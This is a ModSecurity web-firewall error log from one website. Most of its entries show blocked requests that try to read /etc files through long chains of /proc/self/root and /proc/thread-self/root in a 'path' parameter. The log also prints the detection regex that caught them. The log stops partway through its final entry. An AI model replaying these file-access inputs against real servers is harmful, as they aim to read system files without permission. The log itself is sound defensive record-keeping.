[Mon Mar 16 09:46:27.882456 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.243.203:42356] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf7o7ysWC90G-1nBrAzqAAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:46:30.239396 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.243.203:42366] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf7po6lpbStxTqkSktdGAAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:46:31.722040 2026] [:error] [pid 10709:tid 140411565680384] [client 74.7.241.46:57258] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf7pxXjF1vJNtV6CWrnLwAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:46:38.471030 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.241.46:42338] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf7rv9ocpUE4ed4uDzbTAAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:47:23.510597 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.241.46:49892] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf72_9ocpUE4ed4uDzbpAAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 09:48:16.835014 2026] [:error] [pid 21946:tid 140411708356352] [client 74.7.244.31:48634] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abf8EHbQATo66fKoS7w7DAAAAMQ"]
[Mon Mar 16 09:48:26.168179 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.243.203:56032] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf8Gv9ocpUE4ed4uDzb4wAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:48:27.478706 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.243.203:49218] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf8G46lpbStxTqkSktdPQAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:48:39.378929 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.243.203:49228] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf8J7ysWC90G-1nBrAz0QAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:48:44.452251 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.241.46:45782] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf8LHjZBu2q05ozVU9EeQAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 09:48:45.532351 2026] [:error] [pid 21946:tid 140411632822016] [client 74.7.243.203:34646] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf8LXbQATo66fKoS7w7GQAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:48:49.619537 2026] [:error] [pid 32654:tid 140411666392832] [client 74.7.243.203:34660] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf8MAlT9VtDQc7bgUyaYAAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:49:20.506224 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.241.46:39596] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf8UP9ocpUE4ed4uDzcCQAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:50:44.133947 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.241.46:57882] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf8pNSswJuvopo3lOhOaAAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Mon Mar 16 09:50:46.682994 2026] [:error] [pid 21946:tid 140411708356352] [client 74.7.243.203:47374] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf8pnbQATo66fKoS7w7mwAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:50:47.706481 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.241.46:51898] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf8p5qj1wV0Si-OkefYGgAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:50:50.123062 2026] [:error] [pid 21533:tid 140411548894976] [client 74.7.243.203:57896] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf8qnjZBu2q05ozVU9EnAAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:50:51.789049 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.228.16:53684] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abf8qpqj1wV0Si-OkefYHQAAABI"]
[Mon Mar 16 09:50:54.975139 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.241.46:50026] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf8rnjZBu2q05ozVU9EogAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:51:24.195625 2026] [:error] [pid 32654:tid 140411624429312] [client 74.7.241.46:50042] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf8zAlT9VtDQc7bgUyaswAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Mon Mar 16 09:51:57.628661 2026] [:error] [pid 21946:tid 140411574073088] [client 74.7.241.46:57850] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf87XbQATo66fKoS7w71wAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Mon Mar 16 09:52:03.283301 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.241.46:60936] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf88wlT9VtDQc7bgUyaygAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 09:52:20.905973 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.243.203:35266] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf9A7ysWC90G-1nBrA0hgAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:52:23.464565 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.243.203:34480] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag 